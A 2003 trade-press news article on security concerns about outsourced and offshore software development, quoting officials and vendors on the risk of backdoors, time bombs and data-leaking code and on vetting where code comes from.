Outsourced code raises security concerns

Security concerns are growing over the amount of code that is being outsourced to development companies. The recent FBI raid on a US software company suspected of having links with al-Qadi highlighted the issue.

  • E-Mail
By  Matthew Southwell Published  January 29, 2003

I|~||~||~|Security concerns are growing over the amount of code that is being outsourced to development companies. The recent FBI raid on a US software company suspected of having links with al-Qadi highlighted the issue and it has been discussed at the highest level of the US government.

“This has come up as part of a broader discussion on how do we get trust and reliability [in computer systems,]” Howard Schmidt, vice-chairman of President Bush’s critical infrastructure protection board, told the New York Times.

While companies using development centres in the newer offshore centres such as Russia, Indonesia and the Philippines, are advised to be particularly cautious, the issue encompasses all outsourcers around the world. “Irrespective of where it’s done, we need make sure that our code is clean and protected across the board,” Schmidt said.

A number of potential security threats exist within software code, such as backdoors, which let hackers bypass security controls, time bombs, which will bring down an entire system on a set date, and code that sends out data to an unauthorised third party.

“There’s a good chance that if people haven’t taken precautions in setting up their network, they might not even know this was occurring,” warns James Lewis, senior fellow & director of technology policy, Centre for Strategic & International Studies.

Using bigger, more established development companies offers the best protection against these kinds of threats. However, these precautions can be undermined by the fact that some of these large companies also subcontract development to smaller software houses. As such, Lewis advises organisations to be aware of the potential threats and to ensure that they know who will develop the code.

“If I was a big company I would always ask where does this software come from and who wrote it?” he says.

The large development companies say end users are aware of the issue, although they insist that there is no need for alarm. The companies insist that quality assurance programmes ensure that all code is double checked before the end user receives it.

“There is very heavy tracking of what people are doing,” says Ajith Menon, director & head of operations, MEA, Satyam Computer Services.

Extensive testing is also undertaken to ensure that the code works, which is sometimes replicated by the end users as well. This will uncover most bugs in the system, but problems such as backdoors and time bombs can only be found by analysing the code itself. It is all but impossible for an end user to do this kind of analysis, however, as they will be hunting for just a couple of lines in massive amounts of programming.

“Unfortunately programmes are so huge now with millions of line code, it’s not like you can say ‘give me a print out, I’m going to look at this’,” notes Lewis.

As such, Lewis advises companies to ask about these kinds of issues, and make sure that they are aware of any backdoors, for instance, that have been left in the code.

“If they tell you, that’s fine. If you don’t know about it though, then it’s a risk. It’s like having a door into your house you don’t know about,” he says.

Such backdoors are used to help programmers quickly access the right piece of code while doing development work. However, the vendors say their use is on the decline and that if they are used, then internal controls ensure they are removed before the code is given to the client.

“Usually the client is informed about these things… [but] people don’t very often do that [use backdoors] — not anymore,” says Ali Sheikh, marketing director, Acrologix.

The offshore industry, in particular, has good reason to ensure that this remains the case, as any major incident is likely to dramatically impact their sales. They will always be cheaper than Western and Middle East rivals, but such cost savings will do little to overcome any security fears that may be generated.

“If someone decides that their software isn’t trustworthy, their market dries up instantly…. [So] there’s an incentive for those countries where you are seeing a lot of offshore code writing to make sure they are doing a good job,” says Lewis. ||**||

Add a Comment

Your display name This field is mandatory

Your e-mail address This field is mandatory (Your e-mail address won't be published)

Security code